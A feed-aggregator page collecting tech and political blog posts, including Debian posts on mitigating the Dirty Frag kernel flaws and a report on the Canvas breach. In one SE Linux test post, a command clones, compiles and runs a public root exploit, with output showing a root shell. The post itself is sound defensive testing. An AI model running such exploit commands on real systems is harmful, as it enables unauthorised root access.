https://creativecommons.org/licenses/by/4.0/

Quotations and images are not included in this license; they are included either under a limitation or exception to copyright, or on the basis of a separate license. Please exercise caution.


How to get Pluralistic:

Blog (no ads, tracking, or data-collection):

Pluralistic.net

Newsletter (no ads, tracking, or data-collection):

https://pluralistic.net/plura-list

Mastodon (no ads, tracking, or data-collection):

https://mamot.fr/@pluralistic

Bluesky (no ads, possible tracking and data-collection):

https://bsky.app/profile/doctorow.pluralistic.net

Medium (no ads, paywalled):

https://doctorow.medium.com/

Tumblr (mass-scale, unrestricted, third-party surveillance and advertising):

https://mostlysignssomeportents.tumblr.com/tagged/pluralistic

"When life gives you SARS, you make sarsaparilla" -Joey "Accordion Guy" DeVilla

READ CAREFULLY: By reading this, you agree, on behalf of your employer, to release me from all obligations and waivers arising from any and all NON-NEGOTIATED agreements, licenses, terms-of-service, shrinkwrap, clickwrap, browsewrap, confidentiality, non-disclosure, non-compete and acceptable use policies ("BOGUS AGREEMENTS") that I have entered into with your employer, its partners, licensors, agents and assigns, in perpetuity, without prejudice to my ongoing rights and privileges. You further represent that you have the authority to release me from any BOGUS AGREEMENTS on behalf of your employer.

ISSN: 3066-764X

12:42

Error'd: Null Null Null [The Daily WTF]

The single most common category of entries for this column is failed handling of NaN, null and undefined. Almost exclusively from JavaScript in web pages, sometimes in Node servers, and almost never from any other language or framework. They're getting a bit repetitive, but it's our solemn duty to call out failure where we find it. So if you send us one of these, make sure it identifies the source!

"If you want something you've never had, do something you've never done" exhorted Ben.


"Dashed Hope for Jennifer Null," titled an entry from some guy[sic]. "As recently linked from TDWTF article "Not for Nullthing", not only names can break computer systems, but also article content." Stretching, but we'll allow it.


"Where does Batman go on holiday?" asked Morgan. "Nananananana... Nowhere!"


"UBER is ready for driverless vehicles..." wrote Bruce C. "Uber is getting so big, they can't even keep track of their drivers' names."


"Well at least the reason wasn't null or NaN," wrote Steve W. regarding CenturyLink. "I've been trying for weeks to use their web page to change my (incorrect billing address). Such progress."


Additional entries on the topic from
Dan : "we're fresh out of null"
Henrik : "What is this null music streaming service"
Mike : "Name: undefined"
Laks : "In this app, every new user defaults to a nullptr."
and
Jim : "Think I'll buy $NaCar with this refund!"
and many others were all appreciated and noted.


11:35

Four stable kernels with partial fixes for Dirty Frag [LWN.net]

Greg Kroah-Hartman has announced the release of the 7.0.5, 6.18.28, 6.12.87, and 6.6.138 stable kernels. These kernels contain a partial fix for the Dirty Frag and Copy Fail 2 security flaws. Kroah-Hartman has confirmed that a second patch is required, but it is still in development and has not yet been merged.

10:35

Girl Genius for Friday, May 08, 2026 [Girl Genius]

The Girl Genius comic for Friday, May 08, 2026 has been posted.

10:07

Kinds of fast [Seth's Blog]

There’s the fast of a drag racer. Purpose-built, difficult to steer, expensive and fragile.

There’s the fast of the marathon runner. Beat by a sprinter every time, but able to keep it up for hours.

And the fast of a well-integrated team. Communications, clarity, and respect enable them to produce far more in less time.

Or consider the fast of the craftsperson who spends most of her time studying, measuring, and sharpening before even beginning.

We could choose the fast of the iterator, who produces a dozen or a hundred variations in the time a resistance-fueled perfectionist produces just one. Sometimes it’s faster to do it over than it is to do it right the first time.

And there’s the fast of the follower, copying what came before, avoiding false starts and errors and only coming out ahead at the end.

There’s the fast of the resilient and quick agile professional, who builds with the unexpected in mind. Flexible and not brittle.

You can have the fast-per-project of a custom one-off, or the fast per unit of a high-quality mass-production process.

The fast of chickening out and getting back to work, or the fast of dancing with the chicken and doing what matters.

Or the fast of the well-maintained craft, which rarely gets sidelined with a crisis.

What they all have in common is intent. Each requires trade-offs and is chosen with a purpose in mind.

And then, of course, there’s the slow of “let’s see what happens” or “we always do it this way” or “I don’t care enough to do this well.”

09:14

Retroactive [Penny Arcade]

New Comic: Retroactive

07:35

Daniel Baumann: Debian: Linux Vulnerability Mitigation (Dirty Frag) [Planet Debian]

After Copy Fail [CVE-2026-31431] from last week, the new Linux local root privilege escalations of today are Dirty Frag (Part 1) aka Copy Fail 2 [CVE-2026-43284] and Dirty Frag (Part 2) [CVE-2026-43500].

For those who cannot update to linux >= 7.0.4-1, which was uploaded to sid and contains the needed fixes (backports for trixie are available in trixie-fastforward-backports), who are waiting for backports and updates to older Debian releases, or who can't reboot on short notice, mitigations might be needed.

Given the current trend, it seems we will see more of these bugs in the future. Therefore, I’ve uploaded a new package linux-vulnerability-mitigation to sid containing the mitigation for both Copy Fail and Dirty Frag (with debconf multiselect).

Until it has passed NEW, it can also be downloaded from here:

The package is architecture independent, has no dependencies, and can be installed on any version of Debian or Debian derivative.

Update: Updated text above and descriptions in linux-vulnerability-mitigation for Dirty Frag Part 2 [CVE-2026-43500].

06:49

Russell Coker: Dirty Frag on Debian and SE Linux [Planet Debian]

Hot on the heels of the Copy Fail vulnerability [1] there is a new vulnerability Dirty Frag [2] (I linked to the Alma Linux page because it’s the first one I saw and it explains things well).

The Test System

The test system was running kernel 6.19.14+deb14-amd64 with the configuration from my last test of Copy Fail, which was a default configuration with the following commands run:

semanage login -m -s user_u -r s0 __default__
restorecon -R -v -F /home
semanage login -m -s root -r s0 root
# logout and login again
semodule -X 100 -r unconfined

Strict Policy is Not Vulnerable

I did a quick test on a Debian SE Linux system with a user running as user_t (which is often referred to as “strict policy”) and got the following result:

test@testing1:~/t$ git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
Cloning into 'dirtyfrag'...
remote: Enumerating objects: 26, done.
remote: Counting objects: 100% (26/26), done.
remote: Compressing objects: 100% (20/20), done.
remote: Total 26 (delta 9), reused 23 (delta 6), pack-reused 0 (from 0)
Receiving objects: 100% (26/26), 5.83 MiB | 11.47 MiB/s, done.
Resolving deltas: 100% (9/9), done.
dirtyfrag: failed (rc=1)
test@testing1:~/t/dirtyfrag$ ./exp 
dirtyfrag: failed (rc=1)

I checked the audit log and saw the following:

# audit2allow -al
#============= user_t ==============
allow user_t self:rxrpc_socket create;
allow user_t self:user_namespace create;

It seems that the rxrpc_socket access is the main thing.

I did a search for domains permitted to use that class on a system without unconfined domains and saw the following:

# sesearch -A -c rxrpc_socket
allow daemon init_t:rxrpc_socket { getattr getopt ioctl read setopt write };
allow devicekit_disk_t domain:rxrpc_socket getattr;
allow sosreport_t domain:rxrpc_socket getattr;
allow sysadm_t domain:rxrpc_socket getattr;

This configuration doesn’t appear to be vulnerable, at least to this form of the attack.

Unconfined Domains

I reinstalled the unconfined policy with the following command and assigned it to the user test2 with the following commands:

semodule -X 100 -i /usr/share/selinux/default/unconfined.pp.bz2
semanage login -a -s unconfined_u test2
restorecon -R -v -F /home/test2

I then tested the exploit as user test2 and got the following result:

test2@testing1:~$ git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
Cloning into 'dirtyfrag'...
remote: Enumerating objects: 26, done.
remote: Counting objects: 100% (26/26), done.
remote: Compressing objects: 100% (20/20), done.
remote: Total 26 (delta 9), reused 23 (delta 6), pack-reused 0 (from 0)
Receiving objects: 100% (26/26), 5.83 MiB | 16.57 MiB/s, done.
Resolving deltas: 100% (9/9), done.
# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# 

The kernel message log had the following lines from the time of the attack:

[ 1310.861545] Initializing XFRM netlink socket
[ 1310.909048] alg: No test for authencesn(hmac(sha256),cbc(aes)) (authencesn(hmac-sha256-lib,cbc-aes-aesni))
[ 1310.909935] alg: No test for echainiv(authencesn(hmac(sha256),cbc(aes))) (echainiv(authencesn(hmac-sha256-lib,cbc-aes-aesni)))
[ 1318.353602] process 'su' launched '/bin/sh' with NULL argv: empty string added

Conclusion

It seems that we will be getting a lot of these, so running SE Linux users as user_t is the right thing to do for servers and multi-user systems.

04:49

FFS code review with Protesilaos [Planet GNU]

In the recent weeks I've been engaging Prot as an Emacs coach to help with doing review passes over my upcoming ffs package as I work on polishing and documenting it in preparation for offering it for inclusion in GNU ELPA.

Yesterday we had our second session focused on ffs, which I recorded and share publicly with everyone with Prot's permission, so that others can also benefit from Prot's insights and experience as we discuss various aspects of Emacs package development with the concrete example of ffs.

Here is the video recording of our session:


You can view or download the full-resolution video from the Internet Archive.

I addressed most of Prot's feedback about ffs from our first session, and I'll be working on the changes we discussed in this session in the next days.

In the last third of the video we switched topics to discuss a few Emacs-related tangents including adding a 'padding' effect for the mode line and its constructs, and distilling and separating the easily-reusable package-like parts of one's Emacs configuration from the actual configuration of those parts (e.g. the distinction of prot-lisp and prot-emacs-modules in Prot's Emacs configuration).

For mode line padding, here is the snippet I'm using with Prot's doric-themes:

(doric-themes-with-colors
  (custom-set-faces
   `(mode-line
     ((t :box (:line-width 6 :color ,bg-shadow-intense))))
   `(mode-line-inactive
     ((t :box (:line-width 6 :color ,bg-shadow-subtle))))
   `(mode-line-highlight
     ((t :box (:color ,bg-shadow-intense))))))

Take care, and so long for now.

04:07

Canvas Breach Disrupts Schools & Colleges Nationwide [Krebs on Security]

An ongoing data extortion attack targeting the widely-used education technology platform Canvas disrupted classes and coursework at school districts and universities across the United States today, after a cybercrime group defaced the service’s login page with a ransom demand that threatened to leak data from 275 million students and faculty across nearly 9,000 educational institutions.

A screenshot shared by a reader showing the extortion message that was shown on the Canvas login page today.

Canvas parent firm Instructure responded to today’s defacement attacks by disabling the platform, which is used by thousands of schools, universities and businesses to manage coursework and assignments, and to communicate with students.

Instructure acknowledged a data breach earlier this week, after the cybercrime group ShinyHunters claimed responsibility and said they would leak data on tens of millions of students and faculty unless paid a ransom. The stated deadline for payment was initially set at May 6, but it was later pushed back to May 12.

In a statement on May 6, Instructure said the investigation so far shows the stolen information includes “certain identifying information of users at affected institutions, such as names, email addresses, and student ID numbers, as well as messages among users.” The company said it found no evidence the breached data included more sensitive information, such as passwords, dates of birth, government identifiers or financial information.

The May 6 update stated that Canvas was fully operational, and that Instructure was not seeing any ongoing unauthorized activity on their platform. “At this stage, we believe the incident has been contained,” Instructure wrote.

However, by mid-day on Thursday, May 7, students and faculty at dozens of schools and universities were flooding social media sites with comments saying that a ransom demand from ShinyHunters had replaced the usual Canvas login page. Instructure responded by pulling Canvas offline and replacing the portal with the message, “Canvas is currently undergoing scheduled maintenance. Check back soon.”

“We anticipate being up soon, and will provide updates as soon as possible,” reads the current message on Instructure’s status page.

While the data stolen by ShinyHunters may or may not contain particularly sensitive information (ShinyHunters claims it includes several billion private messages among students and teachers, as well as names, phone numbers and email addresses), this attack could hardly have come at a worse time for Instructure: Many of the affected schools and universities are in the middle of final exams, and a prolonged outage could be highly damaging for the company.

The extortion message that greeted countless Canvas users today advised the affected schools to negotiate their own ransom payments to prevent the publication of their data — regardless of whether Instructure decides to pay.

“ShinyHunters has breached Instructure (again),” the extortion message read. “Instead of contacting us to resolve it they ignored us and did some ‘security patches.'”

A source close to the investigation who was not authorized to speak to the press told KrebsOnSecurity that a number of universities have already approached the cybercrime group about paying. The same source also pointed out that the ShinyHunters data leak blog no longer lists Instructure among its current extortion victims, and that the samples of data stolen from Canvas customers were removed as well. Data extortion groups like ShinyHunters will typically only remove victims from their leak sites after receiving an extortion payment or after a victim agrees to negotiate.

Dipan Mann, founder and CEO of the security firm Cloudskope, slammed Instructure for referring to today’s outage as a “scheduled maintenance” event on its status page. Mann said ShinyHunters first demonstrated they’d breached Instructure on May 1, prompting Instructure’s Chief Information Security Officer Steve Proud to declare the following day that the incident had been contained. But Mann said today’s attack is at least the third time in the past eight months that Instructure has been breached by ShinyHunters.

In a blog post today, Mann noted that in September 2025, ShinyHunters released thousands of internal University of Pennsylvania files — donor records, internal memos, and other confidential materials — through what the Daily Pennsylvanian and other outlets later determined was, in part, a Canvas/Instructure-mediated access path.

“Penn was the named victim,” Mann wrote. “Instructure was the mechanism. The incident was treated as a Penn-specific story by most of the national press and quietly handled by Instructure as a customer-specific matter. That framing was wrong then. It is dramatically more wrong in light of the May 2026 events, which now look like the planned escalation of an attack pattern that ShinyHunters had been working against Instructure’s environment for at least eight months prior. The September 2025 Penn breach was the proof of concept. The May 1, 2026 incident was the production run. The May 7, 2026 recompromise was ShinyHunters demonstrating publicly that the May 2 ‘containment’ did not happen.”

In February, a ShinyHunters spokesperson told The Daily Pennsylvanian that Penn failed to pay a $1 million ransom demand. On March 5, ShinyHunters published 461 megabytes worth of data stolen from Penn, including thousands of files such as donor records and internal memos.

ShinyHunters is a prolific and fluid cybercriminal group that specializes in data theft and extortion. They typically gain access to companies through voice phishing and social engineering attacks that often involve impersonating IT personnel or other trusted members of a targeted organization.

Last month, ShinyHunters relieved the home security giant ADT of personal information on 5.5 million customers. The extortion group told BleepingComputer they breached the company by compromising an employee’s Okta single sign-on account in a voice phishing attack that enabled access to ADT’s Salesforce instance. BleepingComputer says ShinyHunters recently has taken credit for a number of extortion attacks against high-profile organizations, including Medtronic, Rockstar Games, McGraw Hill, 7-Eleven and the cruise line operator Carnival.

The attack on Canvas customers is just one of several major cybercrime campaigns being launched by ShinyHunters at the moment, said Charles Carmakal, chief technology officer at the Google-owned Mandiant Consulting. Carmakal declined to comment specifically on the Canvas breach, but said “there are multiple concurrent and discrete ShinyHunters intrusion and extortion campaigns happening right now.”

Cloudskope’s Mann said what happens next depends largely on whether Instructure’s customers — the universities, K-12 districts, and education ministries paying for Canvas — choose to apply pressure or absorb the breach quietly.

“The history of education-vendor incidents suggests the path of least resistance is the second one,” he concluded.

Update, May 8, 11:05 a.m. ET: Instructure has published an incident update page that includes more information about the breach. Instructure said its Canvas portal is functioning normally again, and that the hackers exploited an issue related to Free-for-Teacher accounts.

“This is the same issue that led to the unauthorized access the prior week,” Instructure wrote. “As a result, we have made the difficult decision to temporarily shut down Free-for-Teacher accounts. These accounts have been a core part of our platform, and we’re committed to resolving the issues with these accounts.”

Instructure said affected organizations were notified on May 6.

“If your organization is affected, Instructure will contact your organization’s primary contacts directly,” the update states. “Please don’t rely on third-party lists or social media posts naming potentially affected organizations as those lists aren’t verified. Instructure will confirm validated information through direct outreach to all affected organizations.”

Update, May 11, 10:16 p.m. ET: Instructure posted an update saying they paid their extortionists in exchange for a promise to destroy the stolen data. “The data was returned to us,” the update reads. “We received digital confirmation of data destruction (shred logs). We have been informed that no Instructure customers will be extorted as a result of this incident, publicly or otherwise.”

00:07

Drawing Penny Arcade [Penny Arcade]

I’ve posted another time lapse of the comic drawing process. This one is for Tattooine, the Maul comic strip we posted yesterday. If you like seeing how the sausage gets made, check it out below! 

00:00

Urgent: Robert Reich's site paywalled [Richard Stallman's Political Notes]

Sad news: Robert Reich's site has become paywalled. As a result, access to an article there requires running nonfree JavaScript code (https://gnu.org/philosophy/javascript-trap.html) and requires identifying oneself by using a payment account. Each of these consequences is unjust, and I have a moral obligation not to refer people to pages that require such things.

I can't let the links remain here as they are, but they are numerous and it will take time to deal with all of them.

The articles I linked to did not have that problem when I made the links.

Urgent: Executive order could label millions of Americans as domestic terrorists [Richard Stallman's Political Notes]

US citizens: call on Congress to refuse to fund Trump’s executive order that could label millions of Americans as domestic terrorists, or to block it in any fashion.

See the instructions for how to sign this letter campaign without running any nonfree JavaScript code--not trivial, but not hard.

US citizens: Join with this campaign to address this issue.

To phone your congresscritter about this, the main switchboard is +1-202-224-3121.

Please spread the word.

Urgent: Stand up for science [Richard Stallman's Political Notes]

US citizens: call on Congress to stand up for science, not polluter profits.

US citizens: Join with this campaign to address this issue.

To phone your congresscritter about this, the main switchboard is +1-202-224-3121.

Please spread the word.

Urgent: Drop bogus charges against James Comey [Richard Stallman's Political Notes]

US citizens: call on the Department of supposed Justice to drop bogus charges against James Comey and stop persecuting political speech.

Increase in FBI personnel working on "immigration-related matters" [Richard Stallman's Political Notes]

*There were 279 FBI personnel working on "immigration-related matters" [i.e., persecution] before [the persecutor] took office in January 2025, according to bureau records The Intercept obtained through a Freedom of Information Act request. By September, that number had ballooned to more than 6,500.*

Global heating will isolate New Orleans and Baton Rouge [Richard Stallman's Political Notes]

Global heating will isolate New Orleans and Baton Rouge in the middle of the sea, miles away from land. New Orleans must start now to move to higher ground.

Supreme court ruling on voting rights act [Richard Stallman's Political Notes]

*Six supreme court justices handed down a ruling built, ostensibly, on the belief that the US has changed so much as to render the protections of the Voting Rights Act unnecessary. No one should be that gullible.*

Activists from flotilla captured and jailed by Israel [Richard Stallman's Political Notes]

Activists Israel captured on the recent Gaza aid flotilla are being jailed in Israel. They told their lawyers that they are being held in solitary confinement, blindfolded.

Israel claims they are part of a group which it accuses of working secretly with HAMAS. That would be a bad thing if true, but I won't believe it on Israel's say-so. That is a standard way that right-wing extremists in the US and Israel try to smear anyone that defends the rights of Palestinians.

Even supposing that is true, it can't justify abuse of prisoners by Israel.

Executive agencies ignoring US courts [Richard Stallman's Political Notes]

*[Executive agencies are] increasingly ignoring US courts, new analysis shows.

Critics warn that respect for rule of law could break down as executive branch flouts judicial decisions.*

Zambia cancelled RightsCon conference [Richard Stallman's Political Notes]

Zambia agreed to hold the RightsCon conference this May, but canceled it shortly before it happened.

The article speculates this was due to pressure from China, and there may have been such pressure, but I have a hunch that the Zambian ruler objected to the event's support for equal rights for queer people. Zambia is very repressive in that area.

Starmer trying to label defense of Palestine as antisemitism [Richard Stallman's Political Notes]

Starmer is seeking a path to label defense of Palestine as antisemitism.

Once you accept that identification, you will inevitably take an unjust stance on at least one of the two issues.

Starmer Labour called itself the "adults" [Richard Stallman's Political Notes]

Starmer Labour called itself the "adults", meaning the ones who would prevent adoption of mad policies such as raising taxes on the rich. This protects rich people from increases in taxation, thus leaving a choice of various policies that won't solve the big problem of impoverishing the non-rich.

With a right-wing party in power, the "adults" may try to stop it from tearing up the legal system and constitution. However, with an ostensibly left-wing party in power, the "adults" try to prevent any major economic changes that could once again direct a large part of the country's productive capacity to the non-rich.

TikTok's "For You" pages prioritize pro-Republican messages [Richard Stallman's Political Notes]

*Researchers found that TikTok's "For You" pages prioritized pro-Republican [messages] in New York, Texas and Georgia.*

The researchers operated many dummy accounts and tallied what the site showed them, comparing that with the preferences each account expressed through which videos it cut off.

The experiment does not reveal how the site chose the videos it chose to present to each user. We don't know whether the site was specifically programmed to show more right-wing messages. Perhaps the site prefers characteristics that are more often found in right-wing messages.

But ultimately that design detail is not very important. What matters is that TikTok spreads right-wing bias.

Accusation Modi's party stole election [Richard Stallman's Political Notes]

The leftist premier of West Bengal has accused Modi's party of stealing the election.

This is plausible, given the laws they adopted to deprive Muslims of Indian citizenship if they don't have written proof of it. One of the two laws (which operate together) is explicitly biased against Muslims.

Thursday, 07 May

23:49

Fedora Project Leader says he doesn’t care about the reputational damage from Fedora embracing “AI” [OSnews]

On the Fedora forums, there’s a long-running thread about a proposal for Fedora to build a variant of the distribution aimed specifically at “AI”. The “problem” identified in the proposal is that setting up the various parts that a developer in the “AI” space needs is currently quite difficult on Fedora, and as such, a bunch of technical steps need to be taken to make this easier. Setting aside the “AI” part of the proposal and ensuing discussion, it’s actually a very interesting read, going deep into the weeds about consequential questions like building an LTS kernel on Fedora, support for out-of-tree kernel modules, and a lot more.

To spoil the ending: the proposal has already been approved unanimously by the Fedora Council, meaning the efforts laid out in the proposal will be undertaken. This means that, depending on progress, we’ll see a Fedora “AI” Desktop or whatever it’s going to be called somewhere in the timeframe from Fedora 45 to Fedora 47. As a Fedora user on all my machines, I’m obviously not too happy about this, since I’d much rather the scarce resources of a project like Fedora go towards things not as ethically bankrupt, environmentally destructive, and artistically deficient as “AI”, but in the end it’s a project owned and controlled by IBM, so it’s not exactly unexpected.

What really surprised me in this entire discussion is a post by Fedora Project Leader Jef Spaleta, responding to worries people in the thread were having about such a big “AI” undertaking under the Fedora branding causing serious reputational damage to Fedora as a whole. These concerns are clearly valid, as people really fucking hate “AI”, doubly so in the open source community whose work especially “AI” coding tools are built on without any form of consent. As such, Fedora undertaking a big “AI” desktop project is bound to have a negative impact on Fedora’s image. Just look at what aggressively pushing Copilot has done to Windows 11’s already shit reputation.

Spaleta, however, just doesn’t care. Literally.

As the Fedora Project Leader, I am absolutely not concerned about the reputational damage to this project that comes with setting up an entirely new output attractive to developers who want to make use of Ai tools.

↫ Jef Spaleta

I’ve been looking at this line on and off for a few days now, and I just can’t wrap my head around how the leader of an open source project built on and relying on the free labour of thousands of contributors says he doesn’t care about reputational damage to the project he’s leading. Effective and capable open source contributors are not exactly a commodity, and a lot of the decisions they make about what projects to donate their time to are based on vibes and personal convictions – you can’t really pay them to look the other way. Saying you don’t care about reputational damage to your huge open source project seems rather shortsighted, but of course, I don’t lead a huge open source project so what do I know?

In the linked thread alone, one long-time Fedora contributor, Fernando Mancera, already decided to leave the project on the spot, and I have a sneaking suspicion he won’t be the last. “AI” is a deeply tainted hype on many levels, and the more you try to chase this dragon, the more capable people you’ll end up chasing away.

23:00

Page 11 [Flipside]

Page 11 is done.

05/07/26 [Flipside]

Gonna be at Anime Minneapolis this weekend, in the artist alley! Hope to see some of you there!

Reproducible Builds: Reproducible Builds in April 2026 [Planet Debian]

Welcome to our April 2026 report from the Reproducible Builds project!

Our reports outline what we’ve been up to over the past month, highlighting items of news from elsewhere in the increasingly-important area of software supply-chain security. As ever, if you are interested in contributing to the Reproducible Builds project, please see the Contribute page on our website.

In this month’s report, we cover:

  1. Tor stateless relays and Reproducible Builds
  2. Civil Infrastructure Platform celebrates 10 years of supporting industrial grade Linux
  3. Reproducible Builds at LinuxFest NorthWest
  4. Reproducibility issues in Rust binaries that embed random bytes
  5. Distribution work
  6. Patches
  7. diffoscope development
  8. Documentation updates
  9. Misc news


Tor stateless relays and Reproducible Builds

An interesting post was published on the Tor Project blog by Osservatorio Nessuno OdV this month on “stateless relays”. These are stateless, diskless operating systems that are designed to be used as Tor exit relays. According to the post, which is titled A Server That Forgets: Exploring Stateless Relays:

For relay operators, this approach raises the security bar by enforcing better behaviors by design: […]

  1. Reproducibility. A system that doesn’t change between reboots is easier to verify and, eventually, to reproduce and audit.

Furthermore, using a Trusted Platform Module (TPM) could allow for greater integrity in the future:

Transparency logs. Once you have a measured boot chain, you can publish it. A relay operator provides a recipe for a reproducible build; anyone can recompute the expected hash and verify it matches what the TPM reports. An append-only transparency log can make these attestations publicly auditable. The Tor community could run an independent monitor to track this across the relay fleet.
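The verification loop described in the quote can be sketched minimally in Python; the function names here are placeholders, and a real attestation would cover the whole measured boot chain rather than a single file:

```python
import hashlib

def sha256_of(path: str) -> str:
    """Compute the SHA-256 digest of a file, streaming in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_attestation(artifact_path: str, published_hash: str) -> bool:
    """Compare a locally rebuilt artifact against the published (TPM-reported) hash."""
    return sha256_of(artifact_path) == published_hash
```

Anyone who can rebuild the artifact from the published recipe can recompute the digest and check it against the transparency log entry, with no need to trust the relay operator.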


Civil Infrastructure Platform celebrates 10 years of supporting industrial grade Linux

Congratulations to the Civil Infrastructure Platform (CIP) for reaching their 10-year anniversary last month. CIP has been a supporter of Reproducible Builds for many years, and we have collaborated on a number of technical issues that overlap. As Chris Lamb mentions in CIP’s press release:

The collaboration between the Reproducible Builds project and CIP highlights a critical shift in how we approach industrial software. Through verifiability, CIP ensures that the open source foundation of our critical infrastructure is not only sustainable but also demonstrably secure. This commitment to transparency is vital for the trust and resilience required by critical systems over decades of operation.


Reproducible Builds at LinuxFest NorthWest

Vagrant Cascadian and Chris Lamb hosted a table in the exposition hall at LinuxFest NorthWest 2026 this month in Bellingham, WA, USA, introducing many people to Reproducible Builds and answering questions both days of the conference.

In addition, Vagrant presented Beyond Trusting Open Source Software on Sunday afternoon, exploring the intersection of Free/Open Source Software, Reproducible Builds and Bootstrappable builds, and how they all reinforce each other. Vagrant’s slides are available online, including source code to build them reproducibly.


Reproducibility issues in Rust binaries that embed random bytes

Reproducible Builds developer kpcyrd opened a ticket on the Rustsec issue tracker regarding Rust binaries that deliberately embed random bytes “as a secret seed for a Hash Collision DoS mitigation.”

As kpcyrd notes in his message, this causes issues for reproducibility, and because the relevant end-user binaries are “mostly distributed pre-compiled through package managers, those binaries (and by extension the secret seed) are public knowledge”. kpcyrd goes on to note:

This is somewhat unique to Rust because Python/JavaScript doesn’t compile binaries, and Go (to my knowledge) is too restrictive during build for any library to pull something like this.
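As a toy illustration (a sketch, not the actual Rust mechanism), a build step that embeds a fresh random seed produces outputs that differ between runs, and the "secret" seed is trivially recoverable from the shipped binary:

```python
import os

def build_binary(payload: bytes) -> bytes:
    """Simulate a build that appends a fresh random seed to its output."""
    seed = os.urandom(16)  # regenerated on every build, so no two builds match
    return payload + seed

def extract_seed(binary: bytes) -> bytes:
    """Anyone holding the distributed binary can read the 'secret' seed back out."""
    return binary[-16:]
```

This is exactly the double problem kpcyrd describes: the binary is not bit-for-bit reproducible, and once distributed pre-compiled, the seed is public knowledge and no longer mitigates anything.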


Distribution work

In Arch Linux this month, Robin Candau and Mark Hegreberg worked on adding a new repro tag/version to the Arch Linux Docker images providing a bit-for-bit reproducible image. Robin also shared a related announcement and implementation details on our mailing list.

Arch Linux developer Robin Candau posted a blog post announcing that “Arch Linux Now Has a Bit-for-Bit Reproducible Docker Image”. Robin mentions one interesting caveat:

to ensure reproducibility, the pacman [package manager] keys have to be stripped from the image, meaning that pacman is not usable out of the box in this image. While waiting to find a suitable solution to this technical constraint, we are therefore providing this reproducible image under a dedicated tag as a first milestone. []

The blog post was also discussed on Hacker News.


In Debian this month, 24 reviews of Debian packages were added, 7 were updated and 16 were removed, adding to our knowledge about identified issues.

Vagrant Cascadian performed Non-Maintainer Uploads (NMUs) in Debian for several packages with outstanding patches over a year old: jakarta-jmeter, wxmplot, critcl, vcsh and magic-wormhole-transit-relay.

In addition, Reproducible Builds developer Jochen Sprickerhof filed a bug against the APT package manager to request that “APT should ignore [a] 0 epoch when downloading or installing with a version specifier”. This is related to the special-case handling of the optional epoch prefix in Debian package version numbers.
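The epoch special case can be illustrated with a tiny sketch, assuming only the documented Debian rule that a missing epoch is equivalent to an explicit 0: prefix (this illustrates the versioning rule itself, not APT's actual comparison code):

```python
def split_epoch(version: str) -> tuple[int, str]:
    """Split a Debian version string into (epoch, rest); a missing epoch means 0."""
    if ":" in version:
        epoch, rest = version.split(":", 1)
        return int(epoch), rest
    return 0, version

def same_version(a: str, b: str) -> bool:
    """Under Debian policy, '0:1.2-1' and '1.2-1' name the same version."""
    return split_epoch(a) == split_epoch(b)
```

The bug report concerns exactly this mismatch: a user asking for a version with an explicit 0 epoch should match the same package published without one.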


In NixOS, Julien Malka presented Lila: Decentralized Build Reproducibility Monitoring for the Functional Package Management Model, a paper written together with Arnout Engelen at the Mining Software Repositories (MSR) ACM conference, where it was awarded the MSR 2026 FOSS Impact Award. Congratulations!


Lastly, in openSUSE, Michael Schroeder added reproducibility verification support in the Open Build Service [] and Bernhard M. Wiedemann posted another openSUSE monthly update for their reproducibility work there.


Patches

The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where applicable or possible. This month, we wrote a large number of such patches, including:


diffoscope development

diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made a number of changes, including preparing and uploading versions 316, 317 and 318 to Debian.

  • Chris Lamb:

    • Bump Standards-Version to 4.7.4. []
    • Correct ordering of python3-guestfs architecture restrictions. []
    • Limit python3-guestfs Build-Dependency to architectures that are not i386. []
    • Try to fix PYPI_ID_TOKEN debugging. []
  • Holger Levsen:

    • Add ppc64el to the python3-guestfs architecture whitelist. (Closes: #1132974). []

In addition, Vagrant Cascadian updated diffoscope in GNU Guix to version 317.


Documentation updates

Yet again, there were a number of improvements made to our website this month including:


Misc news

On our mailing list this month:

  • Timo Pohl posted to our list inviting people to “online group discussions with 4-6 participants each to talk about your perception of terms and requirements for reproducibility.” As Timo notes:

    During our research of the existing literature, as well as my experience at the Reproducible Builds Summit 2025 in Vienna, we noticed that some of the terminology in the field is not used consistently across different groups of people, and that the precise meaning of some core terms like “reproducibility of an artifact” in itself is not uniform.

    As Timo mentions, the sessions will last roughly 90 minutes and will be rewarded with 50€ per participant.

  • kpcyrd posted to the list asking for assistance with fixing an issue after updating the flake.lock file for their repro-env project.

  • Aman Sharma of the KTH Royal Institute of Technology, Sweden, posted to our list in order to share that Eric Cornelissen, a PhD student in KTH’s CHAINS group, is maintaining an open-source project to monitor the reproducibility of GitHub Actions:

    The goal of the project is to assess whether GitHub Actions can be reproduced. Currently, it focuses on two types of Actions: JavaScript-based actions and Docker-based actions (composite actions are not considered). For JavaScript actions, the project rebuilds the distributed files and compares them bit-by-bit with the repository contents. For Docker actions, it rebuilds images from the Dockerfile and checks for semantic equivalence, using diffoci, across builds.
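For the JavaScript actions, the check described above amounts to a plain bit-for-bit file comparison between the rebuilt and distributed files; a minimal sketch assuming both files are on local disk (not the project's actual tooling):

```python
import filecmp

def reproduced(distributed: str, rebuilt: str) -> bool:
    """True if the rebuilt dist file matches the distributed one bit-for-bit."""
    # shallow=False forces a byte-by-byte content comparison,
    # rather than trusting matching os.stat() metadata.
    return filecmp.cmp(distributed, rebuilt, shallow=False)
```

The Docker case is harder, which is why the project reaches for diffoci and semantic equivalence there instead of raw byte equality.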



Finally, if you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. Alternatively, you can get in touch with us via:

22:49

Algol 68 support in VS Code [Planet GNU]

Pietro Monteiro has added Algol 68 syntax highlighting support for VS Code. You can get the sources at https://codeberg.org/sleepy4727/supper-algol-68. He has also adapted it to add support for Algol 68 syntax highlighting in Compiler Explorer, with the help of Iain Buclaw. See how it looks at https://godbolt.org/z/84bPbbexa.

With this work VS Code joins Emacs and Vim in the happy family of editors providing syntax highlighting and indentation for Algol 68.

